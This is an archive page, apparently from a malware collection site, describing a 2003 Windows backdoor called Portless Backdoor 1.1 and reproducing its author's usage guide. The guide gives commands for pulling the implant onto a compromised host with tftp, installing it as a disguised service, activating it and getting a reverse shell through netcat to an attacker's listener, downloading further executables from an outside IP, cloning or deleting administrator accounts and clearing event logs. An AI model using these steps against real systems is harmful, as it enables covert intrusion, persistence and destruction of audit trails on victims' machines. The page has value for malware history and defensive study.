Portless Backdoor 1.1
Released 21 years, 2 months ago. September 2003
Copyright © MegaSecurity
By WinEggDrop
Informations
| From | China |
| Author | WinEggDrop |
| Family | Portless Backdoor |
| Category | Remote Access |
| Version | Portless Backdoor 1.1 |
| Released Date | Sep 2003, 21 years, 2 months ago. |
| Language | C |
Author Information / Description
PortLess BackDoor V1.1
start with svchost.exe,no always port,reconnect(like BITS).
writter:WinEggDrop
new function:
1.Examination cloned account
2.clear log
3.clone account
4.del account(also can del Guest,Administrator)
5.list account
6.http download
7.install term
8.list all IP
9.reboot,shutdown
10.system info
14.list or edit the port of term
how to use:
1.transfer portlessinst.exe&svchostdll.dll(dont rename)to(%winnt%\system32)
2.Portlessinst.exe -install ActiveString Password
intall it
3.net start iprip
start the service
ActiveString|IP:Port connect it
EXAMPLE:
1.when i ger a shell
2,tftp -i myip get portlessinst.exe&svchostdll.dll
3,
c:\winnt\system32\>PortLessinst.exe -install anarchy pass
4.net start iprip
A:
1.nc ip 80
2.anarchy:1982(any port u can choose)
3.nc IP 1982,"Enter Password: "Banner,input the pass:pass
B:if my ip is 13.13.13.13
1.nc -l -p 12345(any port)
2.nc IP 80
3.anarchy|13.13.13.13:12345
4.ok~
but.when u get it,its not a shell of cmd,u can input help to get help
or input ...
1.CheckClone
2.CleanEvent
3.Clone
like:Clone Administrator Guest test
4.DelUser
5.Exit
6.http://ip/a.exe rename.exe
like:http://11.11.11.11/a.exe a.exe
7.Installterm
8.ListIP
9.Logoff
10.PowerOff
11.Reboot
12.ShutDown
13.Shell
get a shell of cmd
14.Sysinfo
15.TerminalPort
16.TerminalPort new port
how to del it:
1.net stop iprip
2.sc delete iprip or portlessinst -uninstall
WinEggDrop
Translated by AnarchyIf you recognize any personal information on this page and wish to have it removed or redacted, please contact us at jplesueur@phrozen.io. We are committed to protecting your privacy in accordance with GDPR regulations.